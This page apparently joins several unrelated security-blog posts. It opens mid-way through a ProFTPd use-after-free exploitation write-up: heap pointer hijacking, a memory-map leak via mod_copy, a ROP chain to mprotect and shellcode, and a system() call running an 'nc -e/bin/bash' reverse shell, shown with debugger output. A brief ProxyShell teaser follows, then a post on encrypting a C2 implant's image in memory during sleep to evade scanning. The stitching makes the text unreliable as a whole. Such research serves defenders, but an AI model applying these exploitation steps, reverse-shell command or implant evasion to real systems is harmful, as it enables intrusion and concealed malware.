char pad[32];
#endif
/* Actual header */
struct {
void *endp;
union block_hdr *next;
void *first_avail;
} h;
};
blok->h.endp
points to the end of current blockblok->h.next
points to the next block in a linked listblok->h.first_avail
points to the first available memory within this blockThis is the alloc_pool()
code:
static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {
size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
size_t sz = nclicks * CLICK_SZ;
union block_hdr *blok;
char *first_avail, *new_first_avail;
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
if (reqsz == 0) {
errno = EINVAL;
return NULL;
}
new_first_avail = first_avail + sz;
if (new_first_avail <= (char *) blok->h.endp) {
blok->h.first_avail = new_first_avail;
return (void *) first_avail;
}
pr_alarms_block();
blok = new_block(sz, exact);
p->last->h.next = blok;
p->last = blok;
first_avail = blok->h.first_avail;
blok->h.first_avail = sz + (char *) blok->h.first_avail;
pr_alarms_unblock();
return (void *) first_avail;
}
As we can see, it first tries to use memory within the same block, if no space, is allocates a new block with new_block()
and updates the pool last block on p->last
.
Pool headers, defined by pool_rec
structure, are stored right after the first block created for that pool, as we can see on make_sub_pool()
which creates a new pool:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
Actually, make_sub_pool()
is responsible for creating the permanent pool aswell, which has no parent. p
will be NULL
when doing it.
Looking at make_sub_pool()
code, you can realize that it gets a new block, and just after the block_hdr
headers, pool_rec
headers are entered and blok->h.first_avail
is updated to point right after it.
Then, entries of the new created pool are initialized.
The p->cleanups
entry is a pointer to a cleanup_t
struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
Cleanups are interpreted by the function run_cleanups()
and registered with the function register_cleanup()
A chain of blocks can be freed using free_blocks()
:
static void free_blocks(union block_hdr *blok, const char *pool_tag) {
union block_hdr *old_free_list = block_freelist;
if (!blok)
return;
block_freelist = blok;
while (blok->h.next) {
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok = blok->h.next;
}
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok->h.next = old_free_list;
}
We have control over a really interesting pool_rec
struct, now we might need to search for primitives that allow us to get something useful from this vulnerability, like obtaining Remote Code Execution.
Obviously to exploit this vulnerability predictable memory addresses is a requirement before using primitives, as in this case, the exploitation consists on playing with pointers, structs and memory writes.
Leaking memory addresses on this situation is really hard, as we are on a cleanup/session finishing process and to trigger the vulnerability we actually need to generate an interruption.
I first thought about reading /proc/self/maps
file, which can be read by any process, even with low privileges.
Perhaps in theory it would work, unfortunately ProFTPd uses stat
syscall to retrieve file size, as stat
over pseudo-files like maps
returns zero, this breaks transfer, and 0 bytes are returned back to client on data channel.
Thinking on additional ways to do it, I realized about mod_copy
, which is a module in ProFTPd that allows you to copy files within the server.
We can use mod_copy
to copy the file from /proc/self/maps
to /tmp
, and once there, we perform a normal transfer over the file at /tmp
which is not a pseudo-file now, so /proc/self/maps
content will be returned to attacker.
This leak is really interesting as it gives you addresses for every segment, and even the filename of the shared libraries, which sometimes contain versions like libc-2.31.so
, and this is really interesting for exploit reliability, we could use offsets for specific libc versions.
We have to transform our control over session.curr_cmd_rec->pool
into any write primitive allowing us to reach run_cleanups()
somehow with an arbitrary cleanup_t
struct.
Looking for struct entry writes, there was nothing useful that would allow us direct write-what-where primitives (would be a lot easier this way).
Instead, the only way we can use to write something on arbitrary addresses is to use make_sub_pool()
(at pool.c:415
), which is called with cmd->pool
as argument at some point:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
This function is called at main.c:287
from _dispatch()
function with our controlled pool as argument:
...
if (cmd->tmp_pool == NULL) {
cmd->tmp_pool = make_sub_pool(cmd->pool);
pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
}
...
As you can see new_pool->sub_next
has now the value of p->sub_pools
, which is controlled, then we enter on new_pool->sub_next->sub_prev
the new_pool
pointer.
This means, we can write to any arbitrary address the value of new_pool
, which apparently, appears not to be so useful at all, as the only relationship we have with this newly created pool cmd->tmp_pool
is that cmd->tmp_pool->parent
is equal to resp_pool
as we are the parent pool for it.
Also the only value we control is the new_pool->sub_next
, which we actually use for the write primitive.
What more interesting primitives do we have?
On a previous section we explained how the ProFTPd pool allocator works, when a new pool is created, p->first
and p->last
point to blocks used for the pool, we are interested in the p->last
as it is the block that is actually used, as we can see on alloc_pool()
at pool.c:570
:
...
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
...
first_avail
is the pointer to the limit between used data and available free space, which is where we will start to allocate memory.
Our pool is passed to pstrdup()
multiple times for string allocation:
char *pstrdup(pool *p, const char *str) {
char *res;
size_t len;
if (p == NULL ||
str == NULL) {
errno = EINVAL;
return NULL;
}
len = strlen(str) + 1;
res = palloc(p, len);
if (res != NULL) {
sstrncpy(res, str, len);
}
return res;
}
This function calls palloc()
which ends up calling alloc_pool()
The allocations are mostly non-controllable strings, which seem not useful to us, except from one allocation at cmd.c:373
on function pr_cmd_get_displayable_str()
:
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
As you can see, cmd->pool
(our controlled pool) is passed to pstrdup()
, and as seen at cmd.c:363
:
...
if (argc > 0) {
register unsigned int i;
res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);
for (i = 1; i < argc; i++) {
res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
}
}
...
res
points to our last command sent
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
This means if we send arbitrary data instead of a command, we could enter custom data on pool block space, and as we can corrupt p->last
we can make blok->h.first_avail
point to any address we want, and this means we can overwrite through a command any data.
Unfortunately, it is not like our corruption from data channel, as here our commands are treated as strings, and not binary data as the data channel does.
This means we are very limited on overwriting structs or any useful data.
Also, some allocations happen before, and the heap from the intial value of blok->h.first_avail
to that value when pstrdup()
‘ing our command will be full of strings, and non valid pointers which could likely end up on a crash before reaching run_cleanups()
.
Initially, I decided to use blok->h.first_avail
to overwrite cmd->tmp_pool
entries with arbitrary data.
This pool is freed with destroy_pool()
at main.c:409
on function _dispatch()
:
...
destroy_pool(cmd->tmp_pool);
cmd->tmp_pool = NULL;
...
This means if we control the cmd->tmp_pool->cleanups
value when reaching clear_pool()
we would have the ability to control RIP and RDI once run_cleanups()
is called:
void destroy_pool(pool *p) {
if (p == NULL) {
return;
}
pr_alarms_block();
if (p->parent) {
if (p->parent->sub_pools == p) {
p->parent->sub_pools = p->sub_next;
}
if (p->sub_prev) {
p->sub_prev->sub_next = p->sub_next;
}
if (p->sub_next) {
p->sub_next->sub_prev = p->sub_prev;
}
}
clear_pool(p);
free_blocks(p->first, p->tag);
pr_alarms_unblock();
}
As you can see clear_pool()
is called, but after accessing some of the entries of the pool, which must be either NULL
or a valid writable address.
Once clear_pool()
is called:
static void clear_pool(struct pool_rec *p) {
/* Sanity check. */
if (p == NULL) {
return;
}
pr_alarms_block();
run_cleanups(p->cleanups);
p->cleanups = NULL;
while (p->sub_pools) {
destroy_pool(p->sub_pools);
}
p->sub_pools = NULL;
free_blocks(p->first->h.next, p->tag);
p->first->h.next = NULL;
p->last = p->first;
p->first->h.first_avail = p->free_first_avail;
pr_alarms_unblock();
}
We can see that run_cleanups()
is called directly without more checks / memory writes.
When calling function run_cleanups()
:
static void run_cleanups(cleanup_t *c) {
while (c) {
if (c->plain_cleanup_cb) {
(*c->plain_cleanup_cb)(c->data);
}
c = c->next;
}
}
Looking at cleanup_t
struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
We can control RIP with c->plain_cleanup_cb
and RDI with c->data
Unfortunately, corrupting cmd->tmp_pool
is difficult, as a string displayable-str
is appended right after our controllable data, and right after our p->cleanup
entry there are some entries that are accessed on destroy_pool()
before reaching run_cleanups()
.
@DUKPT_ who is also working on a PoC for this vulnerability was overwriting gid_tab->pool
. Which is a more reliable technique as there are no pointers after our controllable data, so when displayable-str
is appended, nothing serious will be broken, and also, here, instead of corrupting a pool_rec
structure, we corrupt a pr_table_t
structure, so we can point gid_tab->pool
to memory corrupted from the data channel, which also accepts NULLs and we can craft a fake pool_rec
structure with an arbitrary p->cleanup
value to a fake cleanup_t
struct which will be finally passed to run_cleanups()
.
The interesting use of gid_tab
is also that gid_tab->pool
is passed to destroy_pool()
on pr_table_free()
with argument gid_tab
:
int pr_table_free(pr_table_t *tab) {
if (tab == NULL) {
errno = EINVAL;
return -1;
}
if (tab->nents != 0) {
errno = EPERM;
return -1;
}
destroy_pool(tab->pool);
return 0;
}
This is how pr_table_t
looks like:
struct table_rec {
pool *pool;
unsigned long flags;
unsigned int seed;
unsigned int nmaxents;
pr_table_entry_t **chains;
unsigned int nchains;
unsigned int nents;
pr_table_entry_t *free_ents;
pr_table_key_t *free_keys;
pr_table_entry_t *tab_iter_ent;
pr_table_entry_t *val_iter_ent;
pr_table_entry_t *cache_ent;
int (*keycmp)(const void *, size_t, const void *, size_t);
unsigned int (*keyhash)(const void *, size_t);
void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};
...
typedef struct table_rec pr_table_t;
As you can see after tab->pool
(tab->flags
, tab->seed
and tab->nmaxents
) there are no pointers so the string appended will not trigger crashes
So, what is the plan?
1) Craft a fake block_hdr
structure that will be pointed to by p->last
2) Enter on fake_blok->h.first_avail
a pointer to gid_tab
minus some offset, where offset is depending on the number of allocations and their size, so when pstrdup()
copies our arbitrary command, fake_blok->h.first_avail
value is exactly the address of gid_tab
to fit our address
3) Enter on p->sub_next
the address of tab->chains
so when pr_table_kget()
is called, NULL
is returned to make our arbitrary command being allocated.
4) Send a custom command with a fake pr_table_t
, actually, just the tab->pool
is needed, and point fake_tab->pool
to a fake pool_rec
struct
5) Craft the fake pool_rec
struct, point fake_pool->parent
, fake_pool->sub_next
and fake_pool->sub_prev
to any writable address, and fake_pool->cleanup
to a fake cleanup_t
struct containing our arbitrary RIP and RDI values
This is the result of exploiting the hijack technique:
*0x4242424242424242 (
$rdi = 0x4141414141414141,
$rsi = 0x0000000000000000,
$rdx = 0x4242424242424242,
$rcx = 0x0000555555579c00 → <entry_remove+0> endbr64
)
As you can see c->plain_cleanup_cb
has value 0x4242424242424242
, and c->data
has value 0x4141414141414141
.
Which means RIP and RDI are fully controlled.
As explained, our main target is reaching run_cleanups()
function with an arbitrary address, or with a non-arbitrary address but controlling it’s content. This allow us to obtain full RIP and RDI control, which taking into account that we already have predictable addresses for every segment, means a Remote Code Execution is likely to be possible.
Some ways to obtain Remote Code Execution:
As we control both RIP and RDI, we could search for useful gadgets that would allow us to redirect control-flow using a ROPchain to bypass NX.
When reaching run_cleanups()
…
gef➤ p *c
$7 = {
data = 0x563593915280,
plain_cleanup_cb = 0x7f875ab201a1 <authnone_marshal+17>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/2i c->plain_cleanup_cb
0x7f875ab201a1 <authnone_marshal+17>: push rdi
0x7f875ab201a2 <authnone_marshal+18>: pop rsp
gef➤
When entering on the stack pivot gadget:
→ 0x7f875ab201a1 <authnone_marshal+17> push rdi
0x7f875ab201a2 <authnone_marshal+18> pop rsp
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
0x7f875ab201ae <authnone_marshal+30> jmp rax
We crafted previously our resp_pool
struct to point rax
to the address where an address pointing near a ret
instruction is stored. So when:
mov rax, QWORD PTR [rax+0x18]
is executed, we get in rax
the address, which will be used just on next instruction: jmp rax
.
As it is near a ret
instruction, we will finally execute our ROPchain as we pointed rsp
right before our ROPchain, and a ret
instruction just got executed.
gef➤ p $rax
$5 = 0x563593915358
gef➤ x/gx $rax + 0x18
0x563593915370: 0x00007f875a9fc679
gef➤ x/i 0x00007f875a9fc679
0x7f875a9fc679 <__libgcc_s_init+61>: ret
At the time of jmp rax
:
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
→ 0x7f875ab201ae <authnone_marshal+30> jmp rax
0x7f875ab201b0 <authnone_marshal+32> xor eax, eax
0x7f875ab201b2 <authnone_marshal+34> ret
--------------------------------------------------------------
gef➤ p $rax
$6 = 0x7f875a9fc679
gef➤ x/i $rax
0x7f875a9fc679 <__libgcc_s_init+61>: ret
And we can see stack was pivoted successfully:
gef➤ p $rsp
$7 = (void *) 0x563593915358
gef➤ x/gx 0x563593915358
0x563593915358: 0x00007f875aa21550
gef➤ x/i 0x00007f875aa21550
0x7f875aa21550 <mblen+112>: pop rax
ROPchain will setup a syscall call to SYS_mprotect
, which will change memory protection for a heap range to RXW
. Then, we will jump into the shellcode, thus finally achieving Remote Code Execution
If we check the mappings with gdb we can see that part of the heap is now RWX
, which is actually where the shellcode resides:
0x0000563593889000 0x00005635938cb000 0x0000000000000000 rw- [heap]
0x00005635938cb000 0x0000563593915000 0x0000000000000000 rw- [heap]
0x0000563593915000 0x0000563593916000 0x0000000000000000 rwx [heap]
0x0000563593916000 0x000056359394e000 0x0000000000000000 rw- [heap]
Now we are jumping to shellcode, as it now resides on executable memory, so Remote Code Execution succeed:
0x7f875aa3d229 <funlockfile+73> syscall
→ 0x7f875aa3d22b <funlockfile+75> ret
↳ 0x563593915310 push 0x29
0x563593915312 pop rax
0x563593915313 push 0x2
0x563593915315 pop rdi
0x563593915316 push 0x1
0x563593915318 pop rsi
Chaining all this together into an exploit, this is an screenshot of the successful exploitation of this vulnerability using the ROP approach:
You can jump to any function and control one argument, this means you can call any function with an arbitrary argument. You can reuse register values for other arguments aswell, but you rely on current registers to be valid for target function, eg.: an invalid pointer would trigger a crash
The approach I followed with this method is calling system()
and pointing RDI to a custom command string (netcat reverse shell) I leave in heap with a predictable address.
First we reach destroy_pool()
with the fake pool_rec
struct, actually we reuse entries from our initially controlled struct:
gef➤ p *p
$1 = {
first = 0x563f5c9c6280,
last = 0x7361626174614472,
cleanups = 0x563f5c9a62d0,
sub_pools = 0x563f5c9a6298,
sub_next = 0x563f5c9a62a0,
sub_prev = 0x563f5c9a0a90,
parent = 0x563f5c94a738,
free_first_avail = 0x563f5c94a7e0 "\260\251\224\\?V",
tag = 0x563f5c9a526e ""
}
gef➤ p *resp_pool
$2 = {
first = 0x563f5c9a62d0,
last = 0x563f5c9a6298,
cleanups = 0x563f5c9a62a0,
sub_pools = 0x563f5c9a0a90,
sub_next = 0x563f5c94a738,
sub_prev = 0x563f5c94a7e0,
parent = 0x563f5c9a526e,
free_first_avail = 0x563f5c9a526e "",
tag = 0x563f5c9a526e ""
}
Then, destroy_pool()
is going to call clear_pool()
, which finally ends up calling run_cleanups()
with our fake cleanup_t
struct, pointed to by p->cleanups
:
gef➤ p *c
$3 = {
data = 0x563f5c9a62f0,
plain_cleanup_cb = 0x7fca503f1410 <__libc_system>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/s c->data
0x563f5c9a62f0: "nc -e/bin/bash 127.0.0.1 4444"
As we can see c->plain_cleanup_cb
(future RIP) points to __libc_system()
, and c->data
points to our command string stored on heap
The result if we continue, is the execution of a new process as part of the command execution: process 35209 is executing new program: /usr/bin/ncat
And finally obtaining a reverse shell as the user you logged in with into the FTP server.
RCE Video Demo also available on GitHub (same directory where the exploit resides)
You can find the GitHub issue and patches for this vulnerability here.
On this post we analyzed and demonstrated exploitation for a Use-After-Free in ProFTPd, and could get full Remote Code Execution even with all the protections turned on (ASLR, PIE, NX, RELRO, STACKGUARD etc)
Perhaps authentication is needed, this is sometimes a situation an attacker has, but can not go forward without a RCE exploit like this.
You can find the ROP approach exploit here.
You can find the other exploit using system()
and netcat here.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
This is a guest post DEVCORE collaborated with Zero Day Initiative (ZDI) and published at their blog, which describes the exploit chain we demonstrated at Pwn2Own 2021! Please visit the following link to read that :)
If you are interesting in more Exchange Server attacks, you can also check our series of articles:
With ProxyShell, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an exposed 443 port! Here is the demonstration video:
In the course of building a custom C2 framework, I frequently find features from other frameworks I’d like to implement. Cobalt Strike is obviously a major source of inspiration, given its maturity and large feature set. The only downside to re-implementing features from a commercial C2 is that you have no code or visibility into how a feature is implemented. This downside is also an learning excellent opportunity.
One such feature is Beacon’s ability to encrypt its loaded image in memory while it sleeps. It does this to prevent memory scanning from identifying static data and other possible indicators within the image while Beacon is inactive. Since during sleep no code or data is used, it can be encrypted, and only decrypted and visible in memory for the shortest time necessary. Another similar idea is heap encryption, which encrypts any dynamically allocated memory during sleep. A great writeup on this topic was published recently by Waldo-IRC and is available here.
So I set out to create a proof of concept to encrypt the loaded image of a process periodically while that process is sleeping, similar to how a Beacon or implant would.
The code for this post is available here.
To get an idea of the challenges we have to overcome, let’s examine how an image is situated in memory when a process is running.
During process creation, the Windows loader takes the PE file from disk and maps it into memory. The PE headers tell the loader about the number of sections the file contains, their sizes, memory protections, etc. Using this information, each section is mapped by the loader into an area of memory, and that memory is given a specific memory protection value. These values can be a combination of read, write, and execute, along with a bunch of other values that aren’t relevant for now. The various sections tend to have consistent memory protection values; for instance, the .text
sections contains most of the executable code of the program, and as such needs to be read and executed, but not written to. Thus its memory is given Read eXecute protections. The .rdata
section however, contains read-only data, so it is given only Read memory protection.
Why do we care about the memory protection of the different PE sections? Because we want to encrypt them, and to do that, we need to be able to both read and write to them. By default, most sections are not writable. So we will need to change the protections of each section to at least RW, and then change them back to their original protection values. If we don’t change them back to their proper values, the program could possibly crash or look suspicious in memory. Every single section being writable is not a common occurrence!
Another challenge we need to tackle is encrypting the .text
section. Since it contains all the executable code, if we encrypt it, the assembly becomes gibberish and the code can no longer run. But we need the code to run to encrypt the section. So it’s a bit of a chicken and the egg problem. Luckily there’s a simple solution: use the heap! We can allocate a buffer of memory dynamically, which will reside inside our process address space, but outside of the .text
section. But how do we get our C code into that heap buffer to run when it’s always compiled into .text
? One word: shellcode.
I know we all love writing complex shellcode by hand, but for this project I am going to cheat and use C to create the shellcode for me. ParanoidNinja has a fantastic blog post on exactly this subject, and I will borrow heavily from that post to create my shellcode.
But what does this shellcode need to do exactly? It has two primary functions: encrypt and decrypt the loaded image, and sleep. So we will write a small C function that takes a pointer to the base address of the loaded image and a length of time to sleep. It will change the memory protections of the sections, encrypt them, sleep for the configured time, and then decrypt everything and return.
So the final flow of our program looks like this:
- Generate the shellcode from our C program and include it as a char buffer in our main test program called `sleep.exe`
- In `sleep.exe`, we allocate heap memory for the shellcode and copy it over
- We get the base address of our image and the desired sleep time
- We use the pointer to the heap buffer as a function pointer and call the shellcode like a function, passing in a parameter
- The shellcode will run, encrypt the image, sleep, decrypt, and then return
- We're back inside the `.text` section of `sleep.exe`, so we can continue to do our thing until we want to sleep and repeat the process again
Since it’s the simplest, let’s start with a rundown of sleep.exe
.
First off, we include the shellcode as a header file. This is generated from the raw binary (which we’ll cover shortly) with xxd -i shellcode.bin > shellcode.h
. Then we define the struct we will use as a parameter to the shellcode function, which is called simply run
. The struct contains a pointer for the image base address, a DWORD
for the sleep time, and a pointer to MessageBoxA
, so we can have some visible output from the shellcode. In a real implant you would probably want to omit this. Lastly we create a function pointer typedef, so we can call the shellcode buffer like a normal function.
Next we begin our main function. We take in a command line parameter with the sleep time, dynamically resolve MessageBoxA
, get the image base address with GetModuleHandleA( NULL )
, and setup the parameter struct. Then we allocate our heap buffer and copy the shellcode payload into it:
Finally we create a function pointer to the shellcode buffer, wait for a keypress so we have time to check things out in Process Hacker, and then we execute the shellcode. If all goes well, it will sleep for our configured time and return back to sleep.exe
, popping some message boxes in the process. Then we’ll press another key to exit, showing that we do indeed have execution back in the .text
section.
Now we write the C function that will end up as our position-independent shellcode. ParanoidNinja covers this pretty well in his post, so I won’t rehash it all here, but I will mention some salient points we’ll need to account for.
First, when we call functions in shellcode on x64, we need the stack to be 16 byte aligned. We borrow ParanoidNinja’s assembly snippet to do this, using it as the entry point for the shellcode, which then calls our run
function, then returns to sleep.exe
.
Next we need to consider calling Win32 APIs from our shellcode. We don’t have the luxury of just calling them as usual, since we don’t know their addresses and have no runtime support, so we need to resolve them ourselves. However, the usual method of calling GetProcAddress
with a string of the function to resolve is tricky, as we already need to know the address of GetProcAddress
to call it, and using strings in position-independent shellcode requires them to be spelled out in a char
array like this: char MyFunc[] = { 'h', 'i', 0x0 };
. What we can do instead is use the tried and true method of API hashing. I have borrowed a custom GetProcAddress
implementation to do this from here, combining it with a slightly modified djb2 hash algorithm. Here’s how this looks for Sleep
and VirtualProtect
:
Now that we’re able to get the function pointers we need, it’s time to address encrypting the image. The way we’ll do this is by parsing the PE header of the loaded image, since it contains all the information we need to find each section in memory. After talking with Waldo-IRC, it turns out I could also have done with with VirtualQuery
, which would make it a more generalizable process. However I did it the PE way, so that’s what I’ll cover here.
The first parameter of our argument struct to the shellcode is the base address of the loaded image in memory. This is effectively a pointer to the beginning of the MSDOS header. So we can use all the usual PE parsing techniques to find the beginning of the section headers. PE parsing can be tedious, so I won’t give a detailed play by play, just the highlights.
Once we have the address of the first section, we can get the three pieces of information we need from it. First is the actual address of the section in memory. The IMAGE_SECTION_HEADER
structure contains a VirtualAddress
field, which when combined with the image base address, gives us the actual address in memory of the section.
Next we need the size of that section in memory. This is stored in the VirtualSize
field of the section header. However this size is not actually the real size of the section when mapped into memory. It’s the size of the actual data in the section. Since by default memory in Windows is allocated in pages of 4 kilobytes, the VirtualSize
value is rounded up to the nearest multiple of 4k. The bit twiddling code to do this was taken from StackOverflow here.
The last piece of information about the section we need is the memory protection value. This is stored in the Characteristics
field of the section header. This is a DWORD
value that looks something like 0x40000040
, with the left-most hex digit representing the read, write, or execute permission we care about. We do a little more bit twiddling to get just this value, by shifting it to the right by 28 bits. Once we get this value by itself, we save it in an array indexed by the section number so that we can reuse it later to reset the protections:
Now that we can find each section, know its size, and can restore its memory protections, we can finally encrypt. In the same loop where we parsed each section, we call our encryption function:
The encryption/decryption functions take the address, size, and memory protection to apply, as well as a pointer to the address of the VirtualQuery
function, so that we don’t have to resolve it each time:
To encrypt, we change the memory protections to RW, then XOR each byte of the section. Once we have encrypted each section, we finish by encrypting the PE headers. They reside in a single 4k page starting at the base address. With that, the entire loaded image is encrypted!
Now that we’ve encrypted the entire image, we can sleep by calling the dynamically resolved Sleep
function pointer, using the passed-in sleep duration DWORD
.
Once we’ve finished sleeping, we decrypt everything. We have to make sure that we decrypt the PE headers page first, because we use it to find the addresses of all the other sections. Then we pop a message box to tell us we’re done, and return to sleep.exe
!
ParanoidNinja covers this part in detail as well, but briefly the process is this:
- Compile the stack alignment assembly and the C code to an object file
- Link the two object files together into an EXE
- Use `objcopy` to extract just the `.text` into file
- Convert the shellcode file into a `char` array for `sleep.c`
To verify everything is being encrypted and decrypted properly, we can use Process Hacker to inspect the memory. Here I’ve called sleep.exe
with a 5 second sleep time. The process has started, but since I haven’t pressed a key, everything is still unencrypted:
Here I have pressed a key and the encryption process has started. I have pressed “Re-Read” memory in Process Hacker, and you can see that the header page has been XOR encrypted:
After the sleep is finished and decryption takes place, we get a message box telling us we’re done. Once we refresh the memory in Process Hacker, we can see we have the PE header page back again!
You can repeat this with each section in Process Hacker and see that they are all indeed encrypted.
I find it really educational to recreate Cobalt Strike features, and this one was no exception. I don’t know if this is at all close to how Cobalt Strike handles sleep obfuscation, but this does seem to be a viable method, and I will likely tweak it further and include it in my C2 framework. If you have any questions or input on this, please let me know or open an issue on Github.